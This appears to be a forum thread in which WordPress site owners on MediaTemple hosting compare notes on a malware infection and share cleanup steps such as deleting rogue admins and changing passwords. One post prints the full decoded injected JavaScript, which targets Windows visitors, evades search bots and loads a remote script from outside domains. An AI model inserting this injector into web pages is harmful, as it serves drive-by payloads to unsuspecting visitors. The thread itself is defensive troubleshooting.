Blog infected with malware

I had the same issue you are describing, but was able to find and get rid of the problem. Basically, I noticed a couple oddities occur before the Malware warning occurred.

1) The main one was the fact that there were 2 new admin users that I had not created. I promptly deleted those.

2) After realizing that there must have been code inserted into the website, I began searching through the template files to see if I found anything fishy. When I opened the ‘Page Template’ file, I noticed an extremely long and gibberish looking php string that began with “<?php $o =”. I promptly deleted that as well.

After doing both of these things, as well as clearing the cookie and site data in Chrome, revisiting my website seems to be working again without the Malware warning.

3) I also changed my password and instructed the other admins on my site to do the same.

I had the same problem. All of the WordPress sites on my MediaTemple gridserver were infected. Chrome gave me the “novelounge.com” malware warning.

Initially, I updated to WP 3.0 and removed the “JohnnyA” admin user that had appeared. This seemed to solve the problem. The next day, however, I got the malware warning again.

Checked out the functions.php file and sure enough the “<?php $o =” code was there. Found it in archive.php on a different site. Removed it, and the malware warnings went away. I’ll be monitoring the sites in the meantime to make sure the problem is truly fixed.

I’ve been experiencing the same problem on all of my sites. pomomusings.com had the warning, as did cleavedesign.com and another site, sarahwalkercleaveland.com, I can’t even get into the wp-admin.

I have over 20+ sites hosted with MediaTemple and it looks like this is a problem with their server. Have you brought it to their attention yet?

I’m on vacation in Hawaii trying to get in to WordPress admins on my iPad and trying to make some of these changes….

Peace,
Adam

Adam, you are correct with it being a MediaTemple issue. The link is here:

https://weblog.mediatemple.net/weblog/category/system-incidents/1378-information-about-compromised-sites

The problem came up again today, though I have been unsuccessful in identifying where the novelounge.com code is being inserted into my website.

However, I did delete unused plugins, one being a contact form plugin that became activated mysteriously (I don’t remember activating it). I also cleared the WP-Super-cache and the problem seems to be gone at this point. But after thinking I was successful yesterday, I am not going to be over-confident.

The domain is officesnapshots.com, if anyone wants to check it out and let me know if they are receivign the warnign in Google Chrome, I’d really appreciate it.

Thanks!

This may help:

https://codex.www.ads-software.com/FAQ_My_site_was_hacked

Got the malware warning again on one of the sites I thought I fixed. (I had removed the mysterious user with admin privileges, removed the “<?php $o =” code, and reset the password for my wp admin account.)

This time, I cleared the wp-super-cache data and deactivated the plugin entirely, and that cleared the malware warning (for now). I realized I had not changed passwords for other administrators on the site, so I did that and noticed that WordPress said I had one more administrator than I was seeing. The user count says “Administrator (4)” but I only see three. I checked the wp_users table in the database, and no sign of the ghost admin. Hmm…

Looks like I have to dig deeper.

(Steve: I didn’t get the malware warning on your site.)

Stevesearer – interesting I also installed a contact form plugin (TDO Mini Forms) a day or two before I also got hit with the same problem? Anyone else got that plugin? Media Temple are very helpful – pretty much delete and start again. Very handy when you’ve 600 posts and images etc. to deal with. Anyone know if this malware causes any damage to anyone who opens? I’m sending an email out to readers and I’d like to say something.

Hey guys, so I think I may have gotten rid of whatever the problem was. We’ll see in a day or so if it stays non-Malwared (word?).

Here are the things I did:
-Uninstalled unused plugins
-changed wordpress passwords
-updated wordpress
-reuploaded and overwrote all wordpress files
-changed ftp password
-changed ftp to secure protocol for when I connect
-changed Mysql passwords
-manually deleted malicious code on site using the following tool:

https://jsunpack.jeek.org/dec/go?

I would enter my domain name into the box and click submit URL’s. It might take some time, but eventually it would spit out a bunch of data. I would just scroll through each entry and look for where the code had been placed. I’d say that doing that after you change all of your passwords as my research made it seem as it compromised passwords was the issue.

-Steve

Got a message from MT this morning:

We may have an additional “cleanup” option available via a third party. We hope to announce plans about that at the end of this week. Please stay tuned to our Status Blog for more details.

Thanks for that very helpful link, Steve.

I scanned one of my affected sites and this is what jsunpack decoded:
//document.write (s) <script type="text/javascript">var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("watchtime")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["edisonsnightclub.com","gaindirectory.org","ideacoreportal.com","karenegren.com"],e=["aqua.","azure.","black.","blue.","brown.","chocolate.","coral.","cyan.","darkred.","fuchsia.","gold.","gray.","green.","indigo.","ivory.","khaki.","lime.","magenta.","maroon.","navy.","olive.","orange.","pink.","plum.","purple.","red.","silver.","snow.","violet.","white.","yellow."],f=Math.floor(Math.random()* d.length),g=Math.floor(Math.random()*e.length);dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="watchtime="+escape("watchtime")+";expires="+dt.toGMTString()+";path=/";document.write('<script type="text/javascript" src="https://'+e[g]+d[f]+'/data/mootools.js"><\/script>')};</script>

Removed the code from the file, but have yet to change all of my passwords…

We just wanted to clear the air of some of the confusion surrounding recent hacks on WordPress installations hosted on (mt) Media Temple.

This issue does not relate to previous security incidents #1167 and #1026 – which were absolutely reflective of an inadequately secure architecture. We’ve accepted responsibility for those past issues, corrected them and have done so publicly: https://weblog.mediatemple.net/weblog/category/system-incidents/gs-investigating-potential-exploit/ and https://weblog.mediatemple.net/weblog/category/system-incidents/1026-gs-security-advisory/. In total, we’ve observed that these more recent attacks are site-specific, and do not represent a hosting-level compromise.

We have provided some significant guidance and support for our customers experiencing these problems on our System Status Blog: https://weblog.mediatemple.net/weblog/category/system-incidents/1378-information-about-compromised-sites/

Steve, I deleted the malicious code, deleted the user Johnny A, changed passwords and two days later I’m back to having a different Malware. Nice of Media Temple to offer the solution to start again but when you’ve customized templates etc. it’s not that simple.

set the php files permission is 404 or 444, js files is 555 and folders are 555. Don’t give the “write” permission to files and folders. Plz check all js files thoroughly. You will see document.write(‘…..’); code at the bottom of every js file. Remove that kind of code from js file. Change the ftp details, email and admin password.